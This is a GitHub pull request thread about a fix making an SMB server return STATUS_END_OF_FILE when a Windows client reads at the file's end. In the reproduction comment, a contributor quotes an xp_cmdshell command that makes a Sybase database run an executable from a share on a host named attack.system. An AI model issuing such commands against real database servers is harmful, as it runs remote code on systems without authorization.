Skip to content

Conversation

@rtpt-romankarwacik
Copy link
Contributor

We had a case where a Windows server was stuck trying to read at the offset of the filesize, which resulted in 0 bytes being returned. In this case we need to return STATUS_END_OF_FILE.

@anadrianmanrique anadrianmanrique added the in review This issue or pull request is being analyzed label Nov 13, 2025
@gabrielg5
Copy link
Collaborator

Hi @rtpt-romankarwacik,
Thank for submitting this PR! Question, I was checking it and see it's aligned with MS documentation...
Was running some tests here on my end but wasn't able to replay the issue. Do you have some steps to trigger it?
Thank you!

@gabrielg5 gabrielg5 added the medium Medium priority item label Nov 18, 2025
@rtpt-romankarwacik
Copy link
Contributor Author

rtpt-romankarwacik commented Nov 18, 2025

It was a Sybase database on a Windows Server 2019.
I ran a command with xp_cmdshell, similar to:

xp_cmdshell '\\attack.system\share\program.exe'

I currently do not have access to it unfortunately.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

in review This issue or pull request is being analyzed medium Medium priority item

Projects

None yet

Development

Successfully merging this pull request may close these issues.

3 participants